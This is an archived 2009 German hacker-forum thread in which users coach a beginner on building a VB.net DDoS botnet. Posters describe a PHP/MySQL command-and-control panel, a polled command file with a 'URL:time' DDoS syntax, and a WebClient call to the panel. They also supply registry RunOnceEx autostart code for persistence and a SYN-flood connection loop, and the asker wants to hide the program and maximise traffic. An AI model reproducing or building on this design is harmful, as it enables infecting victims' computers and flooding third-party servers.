PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [S] Mentor für Bots



dlite
04.07.2009, 10:18
Suche nen Mentor der eben bissl mehr zeit hat und mir mit codesnippets etc. helfen kann, nen bot in VB.net zu coden.

krusty
04.07.2009, 11:08
was denn für nen bot ?
gibt viekle bezeic hnungen.
1. Bot = Botnetzerk (eine art trojaner)
2. Httpbot = sowas wie Pennergamebot
oder
3. Gamebot = Bot für wow oda so...

Nec
04.07.2009, 11:20
Warscheinlich meint er bot zum DDos'en.
Da würde ich dir Empfehlen erstmal dises Openbook durch zu arbeiten
http://www.galileocomputing.de/openbook/vb_net/

Danach solltest du mit hilfe von google und evtl http://dotnet-snippets.de/dns/Default.aspx
Das auch alleine Hinkriegen.

crackb!tch
04.07.2009, 11:36
Heyho,

erstmal danke an meine Vorposter, wollte ungefähr das gleiche sagen.
Also erstmal aufjedenfall das VB Buch durchlesen, dort werden Grundfunktionen erklärt, und dann ist ein gewisses Vorwissen schon vorhanden.
Den Rest kannst du ganz easy mit Google bewerkstelligen.
Wenn es ein Webpanel Bot werden soll, dann mach es wiefolgt:

Was du benötigst ist ein PHP-Script, worauf der Bot verlinkt und dieses Script zählt, wie viele Bots aktuell Online sein.
Dazu erstellst du dir eine MySQL-Datenbank und eine Session, die jede - sagen wir - 2 Minuten die IP in der Datenbank aktualisiert, wenn der Bot den Befehl zum Script schickt, das er noch Online ist.
Brauchst auch eigentlich nur die Zahl auszugeben, wieviele Bots Online sind.
Den Quelltext kannst du ja mit einer simplen Funktion auslesen, und diesen z.b in einem Label wiedergeben.


Dim wc as New System.Net.WebClient
Dim quelltext as String = wc.DownloadString("http://url.top/BOT_STAT.php

Dann brauchst du noch ein Script, welches die Befehle angibt.
Habe es mal so gemacht, das das Script den Befehl in eine Textdatei auf dem Server schreibt und der Bot sich diese Textdatei jede 15-20 Sekunden holt, habe es dann mit Parametern Replaced und den EndString in meine DDoS Funktion eingetragen.

Also z.b steht 1 für DDoS, dann sah der Befehl bei mir so aus:
1:URL.de:999
Parameter:URL:Zeit
Diesen kannst du ja jetzt ausspliten und die Arrays wiedergeben.
Wenn kein Befehl momentan vorhanden ist, schreibt das Script eine 0 in die TextDatei.
Dann hättest du schonmal die Befehle + die Bot_Stats.

Dein Bot muss eigentlich nur eine DDoS Funktion haben, eine Funktion, die die Bot Stats jede 1:50 aufruft (damit das Script eintragen kann, dass das Victim noch Online ist), und eine Funktion, die jede 15-20 Sekunden die befehl.txt aufruft und den Befehl daraus zieht.

Wenn du es so codest, dann ist es eigentlich ziemlich leicht.
Autostart und Registryeinträge musst du dann noch selbst machen, kannst du aber auch alles mit Google finden.

inmate
04.07.2009, 12:31
Autostart per Registry

Dim registrypfad, name, filepfad As String
registrypfad = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunOnceEx"
name = "Bot"
filepfad = Application.ExecutablePath
My.Computer.Registry.SetValue(registrypfad, name, filepfad, Microsoft.Win32.RegistryValueKind.String)


mfG

dlite
04.07.2009, 12:44
thx für eure antworten. ich werds mal versuchen. (Der link für galileo computing funzt nicht -.-) war genau das was ich gesucht hatte.nimmer dran gedacht dass es auch noch so gamebots etc. gibt^^

NightWorm
04.07.2009, 13:26
kann helfen einfach pn an mich und wir sehen weiter! lg

Nec
04.07.2009, 13:43
Das der Link nicht geht kann sein habe ihn nur aus den Lesezeichen Rauskopiert Aber nicz getestet.

AllesFAM
04.07.2009, 14:42
hm aber mit VB.net dossen Oo ? Weil nen Synflood is doch mit VB meines wissens nach nicht möglich oder ?

dlite
04.07.2009, 14:44
gibt mehr ddos attacken ausser synflood. mir ist vor paar tagen der thread mal begegnet. Ich habe aber grad keine lust den rauszukramen^^

Nec
04.07.2009, 21:22
Wenn du wüsstest was man mit .NET anfagen kann ^^
Ich glaube gelesen zu haben das in der Beta schon 6000 Funktionen drin waren!?
Und Intzwischen sind das bestimmt mehr als 10.000 wenn da mal nicht das richige dabei ist. Desweitern kann man ja immer noch DLL's aus andern Sprachen wie Pascal und C++ einbinden ist zwar etwas schwere als mit .NET Dll's aber es geht auch.

dlite
05.07.2009, 00:02
welche funktion sollte ich benutzen um den ddos befehl ausführen zu lassen?

das mit dem befehl abfragen hab ich jetzt geschnallt

so hab noch ein paar fragen offen. 1. Welche Funktion muss ich benutzen, um möglichst viel Traffic mit dem Bot zu verursachen und 2. wie verstekce ich die consoleapp.?

Wurstfinger
11.08.2009, 12:00
will keiner mehr auf die letzten fragen antworten? =(

Jaro
11.08.2009, 12:40
welche funktion sollte ich benutzen um den ddos befehl ausführen zu lassen?

Glaubst du allen Ernstes, es gibt eine vorgefertige Flooding Funktion im .NET?!

Holy Crap...

wacked
11.08.2009, 22:37
for (i=0;i<1000;i++){
MyCom = new Communication(ResolveHost(targetsite),TargetPort, MySet.SPS);
MyCom.Connect();}
hier bitteschön
das grundgerüst eines supersyn.
du wirst ihn nicht kompilieren können aber vielleicht kommst du mit nachdenken darauf warum ausgerechnet so eine funktion und warum eine schleife.
Ich kann übrigkens keine eine .net sprache sondern habe 30 sekunden geggoglet und 1 minute gelesen. das könnte dir auch helfen

IRET
11.08.2009, 22:46
Und Multithreaded sollte dein DDos auch sein.
Es ist aber das dümmste was man machen kann.
Ein selbst gecodeter Bot und du willst nur DDos??
Es gibt sooo viele Funktionen die 1. Geld verschaffen 2. Spaß machen 3. Nützlich sind.
Und DDos ist das 4.(zerstörend und ein Armutszeugnis)